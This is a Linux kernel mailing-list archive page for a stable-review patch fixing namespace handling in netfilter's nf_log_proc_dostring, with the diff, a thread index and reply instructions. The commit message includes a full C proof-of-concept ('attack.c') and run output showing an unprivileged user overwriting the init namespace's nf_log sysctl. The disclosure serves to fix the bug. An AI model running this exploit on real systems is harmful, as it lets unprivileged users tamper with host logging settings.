From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
stable@vger.kernel.org, Jann Horn <jann@thejh.net>,
Pablo Neira Ayuso <pablo@netfilter.org>
Subject: [PATCH 4.8 92/92] netfilter: fix namespace handling in nf_log_proc_dostring
Date: Thu, 17 Nov 2016 11:33:05 +0100 [thread overview]
Message-ID: <20161117103228.609601883@linuxfoundation.org> (raw)
In-Reply-To: <20161117103224.218007793@linuxfoundation.org>
4.8-stable review patch. If anyone has any objections, please let me know.
------------------
From: Jann Horn <jann@thejh.net>
commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
net/netfilter/nf_log.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct c
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = table->extra2;
if (write) {
struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(str
3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
- nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(str
}
}
+ for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+ table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
next prev parent reply other threads:[~2016-11-17 10:38 UTC|newest]
Thread overview: 83+ messages / expand[flat|nested] mbox.gz Atom feed top
[not found] <CGME20161117103726epcas5p2d4b3b822fdf8596bbd1a48a77364d0ac@epcas5p2.samsung.com>
2016-11-17 10:31 ` [PATCH 4.8 00/92] 4.8.9-stable review Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 01/92] ALSA: info: Return error for invalid read/write Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 02/92] ALSA: info: Limit the proc text input size Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 03/92] ASoC: cs4270: fix DAPM stream name mismatch Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 05/92] mm, frontswap: make sure allocated frontswap map is assigned Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 06/92] shmem: fix pageflags after swapping DMA32 object Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 07/92] swapfile: fix memory corruption via malformed swapfile Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 08/92] mm: hwpoison: fix thp split handling in memory_failure() Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 09/92] mm/hugetlb: fix huge page reservation leak in private mapping error paths Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 10/92] coredump: fix unfreezable coredumping task Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 11/92] s390/hypfs: Use get_free_page() instead of kmalloc to ensure page alignment Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 12/92] ARC: timer: rtc: implement read loop in "C" vs. inline asm Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 13/92] PCI: Dont attempt to claim shadow copies of ROM Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 14/92] arc: Implement arch-specific dma_map_ops.mmap Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 15/92] pinctrl: cherryview: Serialize register access in suspend/resume Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 16/92] pinctrl: cherryview: Prevent possible interrupt storm on resume Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 17/92] cpupower: Correct return type of cpu_power_is_cpu_online() in cpufreq-set Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 18/92] mmc: sdhci: Fix CMD line reset interfering with ongoing data transfer Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 19/92] mmc: sdhci: Fix unexpected data interrupt handling Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 20/92] mmc: mmc: Use 500ms as the default generic CMD6 timeout Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 21/92] staging: iio: ad5933: avoid uninitialized variable in error case Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 22/92] staging: sm750fb: Fix bugs introduced by early commits Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 23/92] staging: comedi: ni_tio: fix buggy ni_tio_clock_period_ps() return value Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 24/92] drivers: staging: nvec: remove bogus reset command for PS/2 interface Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 25/92] Revert "staging: nvec: ps2: change serio type to passthrough" Greg Kroah-Hartman
2016-11-17 10:31 ` [PATCH 4.8 26/92] staging: nvec: remove managed resource from PS2 driver Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 27/92] usb: dwc3: Fix error handling for core init Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 28/92] USB: cdc-acm: fix TIOCMIWAIT Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 30/92] drbd: Fix kernel_sendmsg() usage - potential NULL deref Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 31/92] toshiba-wmi: Fix loading the driver on non Toshiba laptops Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 32/92] clk: qoriq: Dont allow CPU clocks higher than starting value Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 33/92] cdc-acm: fix uninitialized variable Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 34/92] iio: hid-sensors: Increase the precision of scale to fix wrong reading interpretation Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 35/92] iio: orientation: hid-sensor-rotation: Add PM function (fix non working driver) Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 36/92] iio: st_sensors: fix scale configuration for h3lis331dl Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 37/92] scsi: qla2xxx: Fix scsi scan hang triggered if adapter fails during init Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 38/92] scsi: mpt3sas: Fix for block device of raid exists even after deleting raid disk Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 39/92] scsi: scsi_dh_alua: fix missing kref_put() in alua_rtpg_work() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 40/92] scsi: scsi_dh_alua: Fix a reference counting bug Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 41/92] KVM: arm/arm64: vgic: Prevent access to invalid SPIs Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 45/92] drm/i915/dp: Extend BDW DP audio workaround to GEN9 platforms Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 47/92] drm/amdgpu: fix crash in acp_hw_fini Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 51/92] xprtrdma: use complete() instead complete_all() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 52/92] xprtrdma: Fix DMAR failure in frwr_op_map() after reconnect Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 53/92] iommu/io-pgtable-arm: Check for v7s-incapable systems Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 54/92] iommu/amd: Free domain id when free a domain of struct dma_ops_domain Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 55/92] iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 57/92] watchdog: core: Fix devres_alloc() allocation size Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 58/92] Input: synaptics-rmi4 - fix error handling in SPI transport driver Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 59/92] Input: synaptics-rmi4 - fix error handling in I2C " Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 60/92] perf top: Fix refreshing hierarchy entries on TUI Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 61/92] mei: bus: fix received data size check in NFC fixup Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 62/92] svcrdma: Skip put_page() when send_reply() fails Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 63/92] svcrdma: Tail iovec leaves an orphaned DMA mapping Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 64/92] nvme: Delete created IO queues on reset Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 65/92] Revert "clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init" Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 66/92] x86/build: Fix build with older GCC versions Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 67/92] clk: samsung: clk-exynos-audss: Fix module autoload Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 68/92] rtc: pcf2123: Add missing error code assignment before test Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 69/92] s390/dumpstack: restore reliable indicator for call traces Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 70/92] lib/genalloc.c: start search from start of chunk Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 71/92] hwrng: core - Dont use a stack buffer in add_early_randomness() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 72/92] i40e: fix call of ndo_dflt_bridge_getlink() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 73/92] mmc: sdhci-msm: Fix error return code in sdhci_msm_probe() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 74/92] ACPI / APEI: Fix incorrect return value of ghes_proc() Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 75/92] ACPI/PCI/IRQ: assign ISA IRQ directly during early boot stages Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 76/92] ACPI/PCI: pci_link: penalize SCI correctly Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 77/92] ACPI/PCI: pci_link: Include PIRQ_PENALTY_PCI_USING for ISA IRQs Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 80/92] gpio/mvebu: Use irq_domain_add_linear Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 81/92] gpio: of: fix GPIO drivers with multiple gpio_chip for a single node Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 82/92] ASoC: Intel: Skylake: Always acquire runtime pm ref on unload Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 83/92] ASoC: sun4i-codec: return error code instead of NULL when create_card fails Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 84/92] pinctrl: iproc: Fix iProc and NSP GPIO support Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 85/92] mmc: mxs: Initialize the spinlock prior to using it Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.8 86/92] memcg: prevent memcg caches to be both OFF_SLAB & OBJFREELIST_SLAB Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.8 87/92] libceph: fix legacy layout decode with pool 0 Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.8 88/92] NFSv4.1: work around -Wmaybe-uninitialized warning Greg Kroah-Hartman
2016-11-17 10:33 ` Greg Kroah-Hartman [this message]
[not found] ` <20161117103227.709330459@linuxfoundation.org>
2016-11-17 10:51 ` [PATCH 4.8 78/92] batman-adv: fix splat on disabling an interface Sven Eckelmann
2016-11-17 12:02 ` Greg Kroah-Hartman
[not found] ` <ff6afc35-bd5d-f6f0-f483-e1bc692646d5@samsung.com>
2016-11-17 16:48 ` [PATCH 4.8 00/92] 4.8.9-stable review Greg Kroah-Hartman
2016-11-17 22:23 ` Guenter Roeck
2016-11-18 7:14 ` Greg Kroah-Hartman
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20161117103228.609601883@linuxfoundation.org \
--to=gregkh@linuxfoundation.org \
--cc=jann@thejh.net \
--cc=linux-kernel@vger.kernel.org \
--cc=pablo@netfilter.org \
--cc=stable@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).